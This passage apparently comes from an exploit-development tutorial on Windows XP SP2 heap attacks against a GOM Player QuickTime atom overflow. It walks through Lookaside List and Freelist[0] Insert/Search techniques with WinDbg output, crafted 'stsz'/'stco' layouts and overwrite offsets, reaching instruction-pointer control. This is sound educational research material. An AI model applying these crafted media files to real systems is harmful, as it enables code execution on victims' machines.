bp ntdll!RtlFreeHeap "j ((poi(esp+4)==0x03200000) & (poi(esp+c)!=0)) '.printf \"RtlFreeHeap hHeap (0x%p), size=0x%p\\n\", poi(esp+c), wo(poi(esp+c)-8)*8-8; dc poi(esp+c) LC; .echo; g'; 'g';"

With that said, let’s continue execution.

RtlFreeHeap hHeap (0x03207150), size=0x000000c8
03207150  c8000000 7a737473 00000000 00000000  ....stsz........
03207160  08000080 41414141 41414141 41414141  ....AAAAAAAAAAAA
03207170  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA

RtlAllocateHeap hHEAP 0x03200000, size=0x48, chunk at 0x03207240
RtlAllocateHeap hHEAP 0x03200000, size=0x8c, chunk at 0x03207290
RtlAllocateHeap hHEAP 0x03200000, size=0x10, chunk at 0x03207328
RtlAllocateHeap hHEAP 0x03200000, size=0xf8, chunk at 0x03207340
RtlFreeHeap hHeap (0x03207290), size=0x00000090
03207290  8c000000 6f637473 00000000 1f000000  ....stco........
032072a0  d0140000 85a90000 014f0100 a9f30100  ..........O.....
032072b0  cd980200 0d3f0300 c1e40300 958a0400  ......?.........

Interesting. Here we can see that shortly after our overwrite, the “stsz” atom is freed. What’s more interesting however is that after a series of allocations, the “stco” atom, the next atom in our file, is also freed. Looking at either the sizes or contents of these allocations, we can see that two in particular are of interest to us. The first allocation located at 0x03207290 with a size of 0x8C contains the entire “stco” atom. As 0x8C is the same number specified as the “size” element for the “stco” atom, we can assume (correctly) that by modifying this value, we can control the size of the allocation.

The next atom of interest is allocated to 0x03207340 with a size of 0xF8. If we were to follow this function or look at the contents of the allocated block just prior to our free, we can see that it contains a somewhat mutated version of the “Chunk Offset Table”; a sub-table of the “stco” atom. The specifics of which can be found in the QuickTime File Format Specification found here.

Now without going into the all the details, the “Number of Entries” element within the “stco” atom is passed to a copy of our buggy _calloc function where it is multiplied by 0x8. This in turn, triggers an allocation of 0xF8 bytes. So knowing this, by manipulating the “Number of Entries” element, we can control the size of this allocation.

So, with this information it appears that we have enough control over our allocations to return an arbitrary pointer to an allocation request that we can control. However, in order to do so, we’ll first need to modify the size of the “stco” atom so that it matches our corrupted Lookaside List entry. This means that we’ll need to set the “size” element to 0x40 bytes (again, subtracting 0x8 bytes from 0x48 to account for the LAL entry header). Next, we’ll need to trim the contents of this atom to match. And finally, as our “Number of Entries” element is used to control the size of the allocation request that will eventually hold the “Chunk Offset Table”, we’ll need to change this element to 0x8 (0x8*0x8==0x40). And finally, let’s change the first 4 bytes of our “Chunk Offset Table” to 0x79797979 (“yyyy”) and all following bytes to repeating 0x42 (“B”). This will be the data that we write to our arbitrary location.

With that, our “stco” atom will have the following structure:

Size:  0x00000040 (Triggers an allocation of 0x40 bytes)
Type:  0x7374636F (ASCII stco) 
Version:  0x00 
Flags:  0x000000 
Number of Entries: 0x000000008 (Triggers an allocation of 0x40 bytes)
Chunk Offset Table(1):  0x79797979 ("yyyy")
Chunk Offset Table(1):  0x42424242 ("BBBB")
...

Before we test our sample file, we’ll also need to replace the string, “xxxx” within the “stsz” atom to point to a valid, writable location. This is because when ntdll!RtlAllocateHeap attempts to retrieve the chunk pointed to by LAL[9], the address must be both readable and writable, otherwise the free chunk in question will be discarded.This could be a writable function pointer similar to the one we discussed in the previous section. For the sake of this discussion, I’ve chosen a function pointer called by ntdll.dll located 0x7C97F32C.

Now to demonstrate this attack, I’ve provided a proof of concept which applies the structure discussed above. Please note, this sample will only demonstrate control over the instruction pointer and will NOT execute arbitrary code. I leave this task to you to complete.

Please note that this proof of concept may not work reliably! For reasons why, please see the “Why Not?” section below.

And with that, let’s go ahead and monitor how the application handles our proof of concept within a debugger. First, let’s set a break point on our write instruction. Once this has been triggered, we’ll go ahead and set a breakpoint on all allocation requests destined for the private heap located at 0x03200000. This time, instead of automatically continuing execution, we’re going to step through each allocation.

0:000> bp ntdll!RtlAllocateHeap+0x117 "j (poi(@esp+4)==0x03200000) '.printf \"RtlAllocateHeap hHEAP 0x%p, size=0x%x, chunk at 0x%p\\n\", poi(@esp+4), poi(esp+c), eax'; 'g';"
RtlAllocateHeap hHEAP 0x03200000, size=0x48, chunk at 0x03207240

LAL [9] @0x03200838, Expected Chunksize 0x48 (72), Flink : 0x03205ab8
  4 chunks:
     ChunkPtr: 0x03205ab0, UserPtr: 0x03205ab8, Flink: 0x7c97f32c, ChunkSize: 0x20a08, UserSize: 0x209c7, Userspace: 0x20a00 (FFU-2,Busy) 
               ^^ ** Warning - unexpected size value, header corrupted ? **
     ChunkPtr: 0x7c97f324, UserPtr: 0x7c97f32c, Flink: 0x7c811788, ChunkSize: 0x3fc0, UserSize: 0x3fc0, Userspace: 0x3fb8 (Free) 
               ^^ ** Warning - unexpected size value, header corrupted ? **
     ChunkPtr: 0x7c811780, UserPtr: 0x7c811788, Flink: 0x8b55ff8b, ChunkSize: 0x0, UserSize: 0x-90, Userspace: 0x-8 (No Coalesce,Last) 
               ^^ ** Warning - unexpected size value, header corrupted ? **
     ChunkPtr: 0x8b55ff83, UserPtr: 0x8b55ff8b, Flink: 0x00000000, ChunkSize: 0x0, UserSize: 0x0, Userspace: 0x-8 (Free) 
               ^^ ** Warning - unexpected size value, header corrupted ? **

RtlAllocateHeap hHEAP 0x03200000, size=0x40, chunk at 0x03205ab8

Good. Here we can see that our “stco” heap chunk is allocated using the top entry of LAL[9]. This will cause this entry to be popped from the list and returned to the application. If we were to continue stepping through the application, we would see that the top entry of our LAL now points to the function pointer we’ve defined in our file.

RtlAllocateHeap hHEAP 0x03200000, size=0x10, chunk at 0x03207290

LAL [9] @0x03200838, Expected Chunksize 0x48 (72), Flink : 0x7c97f32c
  3 chunks:
     ChunkPtr: 0x7c97f324, UserPtr: 0x7c97f32c, Flink: 0x7c811788, ChunkSize: 0x3fc0, UserSize: 0x3fc0, Userspace: 0x3fb8 (Free) 
               ^^ ** Warning - unexpected size value, header corrupted ? **
     ChunkPtr: 0x7c811780, UserPtr: 0x7c811788, Flink: 0x8b55ff8b, ChunkSize: 0x0, UserSize: 0x-90, Userspace: 0x-8 (No Coalesce,Last) 
               ^^ ** Warning - unexpected size value, header corrupted ? **
     ChunkPtr: 0x8b55ff83, UserPtr: 0x8b55ff8b, Flink: 0x00000000, ChunkSize: 0x0, UserSize: 0x0, Userspace: 0x-8 (Free) 
               ^^ ** Warning - unexpected size value, header corrupted ? **

RtlAllocateHeap hHEAP 0x03200000, size=0x40, chunk at 0x7c97f32c

Excellent. And with our allocation request for the “chunk offset table”, we can see that our arbitrary pointer (0x7C97F32C) has been returned to the application. Clearing all break points and continuing execution we can see that we’ve now gained control over the instruction pointer.

0:000> bc *
0:000> g
ModLoad: 75f40000 75f51000   C:\WINDOWS\system32\devenum.dll
(890.89c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00255178 ebx=7ffdb000 ecx=00255208 edx=00251e90 esi=002551c0 edi=75f40000
eip=79797979 esp=0012c028 ebp=0012c09c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
79797979 ??              ???

Why Not?

There are several issues with applying this attack to our GOM specific vulnerability which may cause exploitation to be unreliable and difficult. First of all, I noticed a number of discrepancies in regards to the heap state when attempting to allocate chunks from the LAL with the “stsz” atom. At times, the offset of these chunks would vary, therefore causing the initial overwrite of the LAL entry’s Flink, to fail. During testing, I was unable to identify a method for making the state of LAL entries within this heap deterministic enough to be considered reliable. If the proof of concept provided above fails, you will need to modify the allocation requests in order to match the appropriate LAL entries.

Furthermore, as this exploitation technique specifically targets the Lookaside List structure which does not exist in later versions of Windows, the arbitrary write technique described above is preferred over this method.

Brett Moore: Wrecking Freelist[0] Since 2005

After the release of Service Pack 2 and the introduction of heap cookies and safe-unlinking, researchers were quickly looking for new methods to replace their now defunct heap exploitation techniques. Although several new tactics were identified by a number of researchers, in my opinion no one has contributed as much to the exploitation and understanding of the XP > SP2 Heap Manager than Brett Moore. In 2005, shortly after the release of SP2, Brett Moore released details regarding 2 attacks, the Freelist[0] Relinking and Searching attacks. Then in 2008, he followed up on his previous work with the addition of the Freelist[0] Insert attack as well as a number of other possible techniques in his 2008 presentation, Heaps about Heaps.

Freelist[0] Insert Attack

Overview

The Freelist Insert, or Linking attack, was first described by Brett Moore in his 2008 presentation, Heaps about Heaps. It is in my opinion one of the easiest generic exploitation techniques to perform which targets the dedicated Freelist. It works by overwriting the Blink pointer of a Freelist entry. A free chunk is then inserted prior to (i.e. smaller than) the corrupted chunk. During the linking process, the heap manager will follow the value specified by our corrupted Blink pointer and then write a pointer to the newly inserted chunk at the address specified by corrupted Blink pointer. Successful exploitation of this attack relies on the ability to overwrite the Blink pointer and control the Freeing of at least one chunk after corrupting a chunk in Freelist[0]. To better explain this concept, let’s take a look at the Freelist structure below:

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8), Flink: 0x00165000
     ChunkPtr: 0x00164FF8, Header: 0x8 bytes, UserPtr: 0x00165000, Flink: 0x00166000, Blink: 0x00160178, ChunkSize: 0x500 (1280), Usersize: 0x500 (1280) 
     ChunkPtr: 0x00165FF8, Header: 0x8 bytes, UserPtr: 0x00166000, Flink: 0x00167000, Blink: 0x00165000, ChunkSize: 0x600 (1536), Usersize: 0x600 (1536) 
     ChunkPtr: 0x00166FF8, Header: 0x8 bytes, UserPtr: 0x00167000, Flink: 0x00160178, Blink: 0x00166000, ChunkSize: 0x700 (1792), Usersize: 0x700 (1792)

Here we can see that Freelist[0] has been populated with 3 chunks with sizes of 0x500, 0x600, and 0x700 respectively. It’s important to note here that the heap manager will always traverse the chunks in Freelist[0], during an allocation request, from smallest to largest. Now, imagine that we were to trigger an overflow into our first chunk at Freelist[0]. For the sake of simplicity, the overflow will maintain the same size values as that of the valid chunk metadata however, the Flink and Blink will have been changed to 0x41414141 and 0x42424242 respectively. This would leave our heap structure looking as follows:

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8), Flink: 0x00165000
     ChunkPtr: 0x00164FF8, Header: 0x8 bytes, UserPtr: 0x00165000, Flink: 0x41414141, Blink: 0x42424242, ChunkSize: 0x500 (1280), Usersize: 0x500 (1280) 
     ChunkPtr: 0x00165FF8, Header: 0x8 bytes, UserPtr: 0x00166000, Flink: 0x00167000, Blink: 0x00165000, ChunkSize: 0x600 (1536), Usersize: 0x600 (1536) 
     ChunkPtr: 0x00166FF8, Header: 0x8 bytes, UserPtr: 0x00167000, Flink: 0x00160178, Blink: 0x00166000, ChunkSize: 0x700 (1792), Usersize: 0x700 (1792)

For the sake of argument, let’s assume that both the Flink and Blink point to addresses with PAGE_READWRITE access (although this is not entirely necessary for the Flink). Now, let’s imagine that the application queries the heap manager and wishes to free a chunk of 0x400 (1024) bytes located at 0x00164000. First, 0x400 bytes is just large enough to guarantee that it’ll be freed to Freelist[0]. Second, as 0x400 is of course smaller than our smallest chunk in the list, 0x500, it’ll be inserted at the top of the list.

Now since our Blink is overwritten with the value 0x42424242, the insert function will be tricked into thinking that another chunk exists prior to (in the Freelists) our chunk at 0x001650000. Because of this, when it inserts itself into the list, it will update the Flink pointer of our non-existent chunk (0x42424242) in order to maintain the doubly linked list. Also, as part of the valid routine, it will update the Blink of the corrupted chunk to point to the newly inserted chunk.

Looking below, we can see the actual function responsible for writing the UserPtr of our inserted chunk to our arbitrary location (0x42424242).

eax=00164000 ebx=00160178 ecx=00165000 edx=42424242 esi=00163FF8 edi=00160000
eip=7c9108f0 esp=0012bcb0 ebp=0012bd6c iopl=0         nv up ei ng nz ac po cy
ntdll!RtlFreeHeap+0x40e
7c9108ee 8908            mov     dword ptr [eax],ecx  ds:0023:00164000=00050000 ; Write UserPtr of corrupted chunk to new chunk's Flink
eax=00164000 ebx=00160178 ecx=00165000 edx=42424242 esi=00163FF8 edi=00160000
eip=7c9108f0 esp=0012bcb0 ebp=0012bd6c iopl=0         nv up ei ng nz ac po cy
ntdll!RtlFreeHeap+0x410:
7c9108f0 895004          mov     dword ptr [eax+4],edx ds:0023:00164004=f00dbaad ; Write corrupted Blink to new chunk's Blink
eax=00164000 ebx=00160178 ecx=00165000 edx=42424242 esi=00163FF8 edi=00160000
eip=7c9108f3 esp=0012bcb0 ebp=0012bd6c iopl=0         nv up ei ng nz ac po cy
ntdll!RtlFreeHeap+0x413:
7c9108f3 8902            mov     dword ptr [edx],eax  ds:0023:42424242=baadf00d	; Write UserPtr of new chunk to arbitrary address (corrupted blink)
eax=00164000 ebx=00160178 ecx=00165000 edx=42424242 esi=00163FF8 edi=00160000
eip=7c9108f0 esp=0012bcb0 ebp=0012bd6c iopl=0         nv up ei ng nz ac po cy
ntdll!RtlFreeHeap+0x415:
7c9108f5 894104          mov     dword ptr [ecx+4],eax ds:0023:03208514=006a0db0 ; Update corrupted chunk's Blink with new chunk's UserPtr
eax=00164000 ebx=00160178 ecx=00165000 edx=42424242 esi=00163FF8 edi=00160000
eip=7c9108f8 esp=0012bcb0 ebp=0012bd6c iopl=0         nv up ei ng nz ac po cy

Now you might be thinking what good is this? We have the ability to overwrite an arbitrary location but only with the UserPtr of our inserted chunk. Well if we can control the contents of our newly inserted free chunk we may be able gain control over the flow of execution by overwriting a function pointer. In this scenario, the UserPtr of our new chunk would be used to overwrite the function pointer. Upon calling the function pointer, the UserPtr would be followed and all data which resides in the user-controllable portion of the heap chunk will be executed***. Furthermore, this attack could also be used to target pointers located within a vtable or Lookaside List Head in order to gain control over execution.

It’s important to note that this attack writes the UserPtr of our inserted chunk to an arbitrary location. As the Flink and Blink both follow the UserPtr, in order to overwrite a function pointer, the assembled opcodes of these addresses must be executable.

It’s also important to note that since we are writing the UserPtr of a freed heap chunk, it will essentially act as a pointer to a pointer (p2p). This could also be abused in overwrite functions as the Flink will point to our corrupted heap chunk, in turn pointing to user-controllable data that can be overwritten via our initial heap overflow.

Application Specific Technique

With the basics covered, let’s discuss how this tactic might be specifically applied to our GOM vulnerability, let’s first take a look at the structure of our Freelists prior to entering our vulnerable function (GSFU!DllUnregisterServer+0x23550). In this example, the vulnerable function is using the private heap located at 0x03200000.

[+] FreeList[00] at 0x03200178, Expected size: >1016 (>0x3f8), Flink: 0x03207150
     ChunkPtr: 0x03207148, Header: 0x8 bytes, UserPtr: 0x03207150, Flink: 0x03208108, Blink: 0x03200178, ChunkSize: 0x6b0 (1712), Usersize: 0x6b0 (1712) 
     ChunkPtr: 0x03208100, Header: 0x8 bytes, UserPtr: 0x03208108, Flink: 0x03205e08, Blink: 0x03207150, ChunkSize: 0xf00 (3840), Usersize: 0xf00 (3840) 
     ChunkPtr: 0x03205e00, Header: 0x8 bytes, UserPtr: 0x03205e08, Flink: 0x03200178, Blink: 0x03208108, ChunkSize: 0x10d8 (4312), Usersize: 0x10cc (4300)

Here we can see that Freelist[0] has been populated with 3 chunks with the sizes 0x6B0, 0xF00, and 0x10D8 respectively. The next step is determine what chunks are allocated and freed after entering our vulnerable function and prior to our targeted write instruction. To determine this, let’s set a breakpoint at the start of our function (GSFU!DllUnregisterServer+0x23550), then once that’s hit, set the following breakpoints.

bp ntdll!RtlAllocateHeap+0x117 "j (poi(@esp+4)==0x03200000) '.printf \"RtlAllocateHeap hHEAP 0x%p, size=0x%x, chunk at 0x%p\\n\", poi(@esp+4), poi(esp+c), eax; g'; 'g';"
bp ntdll!RtlFreeHeap "j ((poi(esp+4)==0x03200000) & (poi(esp+c)!=0)) '.printf \"RtlFreeHeap hHeap (0x%p), size=0x%p\\n\", poi(esp+c), wo(poi(esp+c)-8)*8-8; dc poi(esp+c); .echo; g'; 'g';"
bp GSFU!DllUnregisterServer+0x236a9

Now the first 2 breakpoints will output the size and location of allocations and frees, but only for those chunks which belong to the private heap 0x0320000. Our final breakpoint will halt execution once our targeted write function is hit. Using our OriginalSeed.mov, our non-mutated version, let’s observe the application’s behavior in our debugger.

RtlAllocateHeap hHEAP 0x03200000, size=0x100, chunk at 0x03207158
RtlAllocateHeap hHEAP 0x03200000, size=0x14, chunk at 0x03207260
RtlAllocateHeap hHEAP 0x03200000, size=0xec, chunk at 0x03207280
Breakpoint 2 hit
eax=00000000 ebx=000000ec ecx=03207280 edx=000094b5 esi=0320716c edi=03207108
eip=03b34989 esp=0012bdb4 ebp=03207158 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
GSFU!DllUnregisterServer+0x236a9:
03b34989 891481          mov     dword ptr [ecx+eax*4],edx ds:0023:03207280=00000000

Excellent. So here we can see that 3 chunks are allocated prior to write instruction. The third chunk of course, is where our writes occur. Earlier during our root cause analysis we were able to determine that we can in fact control the size of this field by manipulating the value of our “Number of Entries” element. Now if we were to investigate the contents of the other two chunks after our vulnerable function completed, we would see that the first chunk contains the entire “stsz” atom. We could also infer this due to the requested allocation size of 0x100 bytes (as our “stsz” atom has it’s size field set to 0x100 as well). Our second chunk is essentially a vtable containing pointers to various structures used by this function. This is essentially the same chunk that we targeted during the “Arbitrary Write” section above.

So with this we now know that we can control the size of at least 2 of our allocated chunks. This is good as we’ll need a fair amount of control over our allocations in order to properly manipulate the layout of Freelist[0]. The next step is determine what is freed after our write instruction occurs. To do so, I’ve deleted the breakpoint on our targeted write. Also, for brevity I’ve only included the first free.

RtlFreeHeap hHeap (0x03207158), size=0x00000100
03207158  00010000 7a737473 00000000 00000000  ....stsz........
03207168  3b000000 b5940000 d4520000 a8520000  ...;......R...R.
03207178  2c520000 7c520000 80520000 a4520000  ..R,..R|..R...R.
03207188  28530000 18530000 94520000 20530000  ..S(..S...R...S 
03207198  ac520000 28530000 e0510000 d0520000  ..R...S(..Q...R.
032071a8  88520000 e0520000 94520000 18530000  ..R...R...R...S.
032071b8  14520000 14520000 5c520000 34520000  ..R...R...R\..R4
032071c8  08520000 d4510000 84510000 d8510000  ..R...Q...Q...Q.

Perfect! Here we can see that the first chunk to be freed is the chunk containing the entire “stsz”. As we control the size of this chunk, we can also control where it’s linked. Now, it’s important to note that this isn’t entirely necessary for the purpose of exploitation, however it is beneficial if we can control what and when our chunk is inserted back into Freelist[0] rather than blindly waiting for the application to do it for us.

So with that, let’s put it all together. Let’s take one more look at the structure of Freelist[0] prior to entering our vulnerable function.

[+] FreeList[00] at 0x03200178, Expected size: >1016 (>0x3f8), Flink: 0x03207150
     ChunkPtr: 0x03207148, Header: 0x8 bytes, UserPtr: 0x03207150, Flink: 0x03208108, Blink: 0x03200178, ChunkSize: 0x6b0 (1712), Usersize: 0x6b0 (1712) 
     ChunkPtr: 0x03208100, Header: 0x8 bytes, UserPtr: 0x03208108, Flink: 0x03205e08, Blink: 0x03207150, ChunkSize: 0xf00 (3840), Usersize: 0xf00 (3840) 
     ChunkPtr: 0x03205e00, Header: 0x8 bytes, UserPtr: 0x03205e08, Flink: 0x03200178, Blink: 0x03208108, ChunkSize: 0x10d8 (4312), Usersize: 0x10cc (4300)

Again, we can see that the first chunk has a size of 0x6B0 bytes. Now, the goal here is to have the chunk where our write instructions, or where our overflow begins, placed prior to a chunk on Freelist[0] so that we can overwrite the metadata of one of these chunks. Then, we also want to ensure that our “stsz” chunk, upon being freed, will be inserted into Freelist[0]. Now we know that Freelist[0] manages all chunks containing a size of 0x400 (1024) bytes or larger. So to ensure that our “stsz” chunk is freed to Freelist[0], we must make it at least 400 bytes. In this example, I’ve chosen to set the “stsz” atom to 0x500 bytes. Next, in order to place the chunk containing our sample size table at a location which will allows us to overwrite a Freelist[0] chunk header, I’ve chosen to set the size to 0x400 bytes (0x80000100 * 4).

This might not make sense at first, however consider this. Our first allocation, used to store our entire “stsz” atom, will request a 0x500 byte chunk from Freelist[0]. This will leave our Freelist structure looking as follows:

[+] FreeList[00] at 0x03200178, Expected size: >1016 (>0x3f8)
     ChunkPtr: 0x03208100, Header: 0x8 bytes, UserPtr: 0x03208108, Flink: 0x03205e08, Blink: 0x03200178, ChunkSize: 0xf00 (3840), Usersize: 0xf00 (3840) 
     ChunkPtr: 0x03205e00, Header: 0x8 bytes, UserPtr: 0x03205e08, Flink: 0x03200178, Blink: 0x03208108, ChunkSize: 0x10d8 (4312), Usersize: 0x10cc (4300) 
[+] FreeList[53] at 0x03200320, Expected size: 0x1a8 (424)
     ChunkPtr: 0x03207650, Header: 0x8 bytes, UserPtr: 0x03207658, Flink: 0x03200320, Blink: 0x03200320, ChunkSize: 0x1a8 (424), Usersize: 0x1a8 (424)

What’s this? We can see a that now we only have 2 entries in Freelist[0] as well as a new entry in Freelist[53]. The reason for this is because our first chunk in Freelist[0] had a size of 0x6B0 bytes. This is larger than our allocation request of 0x500 bytes. This causes our first chunk to be split. First, our 0x500 byte chunk will be returned to the application. Then, as the remainder (0x1B0) is no longer big enough to meet the requirements of Freelist[0], it will be moved and reclassified into Freelist[53].

Next, the application will receive our allocation request for 0x400 bytes (our sample size table). The heap manager will then look at the first chunk belonging to Freelist[0], which is 0xF00 bytes. This chunk is large enough, and as with our previous allocation, the chunk will be split and 0x400 bytes will be returned to the application. The remainder, 0xB00 is large enough to remain on Freelist[0]. This will leave our Freelist structure looking as follows:

[+] FreeList[00] at 0x03200178, Expected size: >1016 (>0x3f8)
     ChunkPtr: 0x03208508, Header: 0x8 bytes, UserPtr: 0x03208510, Flink: 0x03205e08, Blink: 0x03200178, ChunkSize: 0xaf8 (2808), Usersize: 0xaf8 (2808) 
     ChunkPtr: 0x03205e00, Header: 0x8 bytes, UserPtr: 0x03205e08, Flink: 0x03200178, Blink: 0x03208510, ChunkSize: 0x10d8 (4312), Usersize: 0x10cc (4300) 
[+] FreeList[49] at 0x03200300, Expected size: 0x188 (392)
     ChunkPtr: 0x03207670, Header: 0x8 bytes, UserPtr: 0x03207678, Flink: 0x03200300, Blink: 0x03200300, ChunkSize: 0x188 (392), Usersize: 0x188 (392)

Therefore, our writes will begin at 0x0320810. After 0x40C bytes, the Flink and Blink of the first chunk belonging to Freelist[0] will be overwritten (0x03208510). Next, our “stsz” atom which is 0x500 bytes in length, will be freed, and inserted in to Freelist[0]. As 0x500 is currently smaller than any other chunk belonging to Freelist[0], it will be inserted at the top of the list, just prior to our overwritten chunk. This will trigger ntdll!RtlFreeHeap, during the insert process, to write our chunk’s UserPtr (0x03208510) to an arbitrary location specified by our Blink pointer.

eax=03207150 ebx=03200178 ecx=03208510 edx=006a0db0 esi=03207148 edi=03200000
eip=7c9108ee esp=0012bcb0 ebp=0012bd6c iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200293
ntdll!RtlFreeHeap+0x40e:
7c9108ee 8908            mov     dword ptr [eax],ecx  ds:0023:03207150=00050000 ; Write UserPtr of corrupted chunk to new chunk's Flink
eax=03207150 ebx=03200178 ecx=03208510 edx=006a0db0 esi=03207148 edi=03200000
eip=7c9108f0 esp=0012bcb0 ebp=0012bd6c iopl=0         nv up ei ng nz ac po cy
ntdll!RtlFreeHeap+0x410:
7c9108f0 895004          mov     dword ptr [eax+4],edx ds:0023:03207154=7a737473 ; Write corrupted Blink to new chunk's Blink
eax=03207150 ebx=03200178 ecx=03208510 edx=006a0db0 esi=03207148 edi=03200000
eip=7c9108f3 esp=0012bcb0 ebp=0012bd6c iopl=0         nv up ei ng nz ac po cy
ntdll!RtlFreeHeap+0x413:
7c9108f3 8902            mov     dword ptr [edx],eax  ds:0023:006a0db0=7e42ce12	; Write UserPtr of new chunk to arbitrary address (corrupted blink)
eax=03207150 ebx=03200178 ecx=03208510 edx=006a0db0 esi=03207148 edi=03200000
eip=7c9108f5 esp=0012bcb0 ebp=0012bd6c iopl=0         nv up ei ng nz ac po cy
ntdll!RtlFreeHeap+0x415:
7c9108f5 894104          mov     dword ptr [ecx+4],eax ds:0023:03208514=006a0db0 ; Update corrupted chunk's Blink with new chunk's UserPtr
eax=03207150 ebx=03200178 ecx=03208510 edx=006a0db0 esi=03207148 edi=03200000
eip=7c9108f8 esp=0012bcb0 ebp=0012bd6c iopl=0         nv up ei ng nz ac po cy

To demonstrate this, I’ve included a proof of concept which can be found here. This sample will overwrite the function pointer located at 0x006A0DB0*** with the UserPtr of the overwritten chunk. This sample will NOT gain code execution. I have simply provided it to demonstrate the use of this attack. A breakdown of the “stsz” atom layout can be found below:

Why 0x006A0DB0? I simply chose the first writable function pointer in a GOM specific module that wasn’t rebased. As far as I know, this function pointer is not called after the execution of our semi-arbitrary write. Again, it is only used to demonstrate the ability to write the UserPtr of our inserted chunk at an arbitrary location.

Size:  0x00000500 (Causes allocation of 0x500 bytes)
Type:  0x7374737A (ASCII stsz) 
Version:  0x00 
Flags:  0x000000 
Sample Size: 0x00000000
Number of Entries: 0x8000000100 (Causes allocation of 0x400 bytes)
Sample Size Table(1):  0x000094B5
Sample Size Table(2):  0x000052D4
...
# Flink - File offset: 0x172B, Value: 0x41414141
# Blink - File offset: 0x172F, Value: 0x006A0DB0

Please note: This proof of concept will trigger an access violation during a later allocation as the Flink has been set to a non-existent address (0x41414141). Access violations due to heap corruption can be delayed by setting this to an address that is marked as READ_WRITE.

After the “stsz” chunk has been inserted, we can see our newly written pointer at 0x006A0DB0. Following that pointer, leads us back to our overwritten chunk.

0:000> dc 0x006A0DB0 L8
006a0db0  03207150 00000001 0000c1b4 0000c1b3  Pq .............
006a0dc0  0000c1b2 0000c1b1 0000c1b0 0000c1af  ................

0:000> dc 0x03207150 LC
03207150  03208510 006a0db0 00000000 00000000  .. ...j.........
03207160  00010080 41306141 61413161 33614132  ....Aa0Aa1Aa2Aa3 
03207170  41346141 61413561 37614136 41386141  Aa4Aa5Aa6Aa7Aa8A

And if we were to look at the assembled opcodes, we can see that they do not represent valid assembly that won’t trigger an access violation. Using the current memory layout, poi(ebp+0x0DB00322) will point to a non-existent address, thus triggering an AV. If we had the ability to manipulate the current memory layout using heap spraying techniques, we may be able to overcome this issue, however, we do not currently have that luxury.

0:000> u 03227150 
03227150 10852203b00d    adc     byte ptr [ebp+0DB00322h],al # This will likely trigger an access violation
03227156 6a00            push    0
03227158 0000            add     byte ptr [eax],al
0322715a 0000            add     byte ptr [eax],al
0322715c 0000            add     byte ptr [eax],al
0322715e 0000            add     byte ptr [eax],al
03227160 800001          add     byte ptr [eax],1
03227163 004161          add     byte ptr [ecx+61h],al

Why Not?

Before moving on to the next generic exploitation technique, I’d like to leave you with a few closing news in regards to why I didn’t choose this method of exploitation.

First of all, exploitation occurs in a private heap. The addresses of which are unpredictable. Because of this, gaining control over the flow of execution would be unreliable as we cannot be certain the the Flink and Blink will be assembled as executable opcodes. Furthermore, several techniques rely on overwriting information within the Heap Base or Lookaside List entries. Fellow Corelan member, mr_me documented one such attack in his tutorial Heap Overflows For Humans 102.5.

Unfortunately, as the base address of private heaps will likely change between execution, the reliability of this technique is minimal (in this particular instance). I do believe that it is possible to use the Freelist[0] Insert attack in order to gain code execution, however, great strides must be made in order to make the heap state far more deterministic, or the location of a semi-static lookup table must be identified. With this, I leave the rest up to you. Good luck!

Freelist[0] Searching Attack

Overview

The final tactic we’ll be discussing is the Freelist[0] Searching attack. This is another attack devised by Brett Moore and first disclosed publicly in his 2005 paper, Exploiting Freelist[0] on XPSP2. This attack involves, as the name would suggest, the manipulation of heap chunks during an allocation search of the dedicated Freelist. More specifically, when an allocation request is received, particularly one destined for Freelist[0] (greater than 1024 bytes), the heap manager will first start with the smallest chunk and continuing traversing the list until a chunk of the appropriate size has been identified. This attack specifically relies on manipulating the Flink pointer of a Freelist[0] heap chunk so that it points at a fake heap chunk with the same size value (+8 bytes to account for the chunk header) as that of the allocation request. The heap manager will then attempt to unlink this fake chunk. Now although the fake chunk will fail the safe unlink check (most of the time* – more on this in a bit), the pointer of the chunk will still be returned to the application. If an attacker can control the contents of this allocation, they can essentially perform an n-byte overwrite similar to the Lookaside List Overwrite technique. To better explain this, let’s take a look at the following example:

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8), Flink: 0x00165000, Blink: 0x00167000
     ChunkPtr: 0x00164FF8, Header: 0x8 bytes, UserPtr: 0x00165000, Flink: 0x00166000, Blink: 0x00160178, ChunkSize: 0x555 (1365), Usersize: 0x555 (1365) 
     ChunkPtr: 0x00165FF8, Header: 0x8 bytes, UserPtr: 0x00166000, Flink: 0x00167000, Blink: 0x00165000, ChunkSize: 0xAAA (2730), Usersize: 0xAAA (2730) 
     ChunkPtr: 0x00166FF8, Header: 0x8 bytes, UserPtr: 0x00167000, Flink: 0x00160178, Blink: 0x00166000, ChunkSize: 0x1000 (4096), Usersize: 0x1000 (4096)

Here we can see that Freelist[0] has been populated with three entries, with sizes of 0x555, 0xAAA, and 0x1000 bytes respectively. Now if a buffer overflow were to occur into our first chunk, we would of course have the ability to overwrite the chunk header. With that, let’s imagine that the chunk header would be overwritten in such a way that the size field is set to 0x8 and that the Flink, for the time being is set to 0x41414141. This would leave our structure looking as follows:

Please note, that both the Size and PrevSize fields within a heap chunk’s metadata use blocks and not bytes. This means that if a size field has a value of 0x0001, this would represent 0x8 bytes as each block is 0x8 bytes. Additionally, a size value of 0x0002 represents 0x16 bytes and so on.

[+] FreeList[00] at 0x00160178, Expected size: >1016 (>0x3f8), Flink: 0x00165000, Blink: 0x00167000
     ChunkPtr: 0x00164FF8, Header: 0x8 bytes, UserPtr: 0x00165000, Flink: 0x41414141, Blink: 0x00160178, ChunkSize: 0x8 (8), Usersize: 0x8 (8) 
     ChunkPtr: 0x00165FF8, Header: 0x8 bytes, UserPtr: 0x00166000, Flink: 0x00167000, Blink: 0x00165000, ChunkSize: 0xAAA (2730), Usersize: 0xAAA (2730)
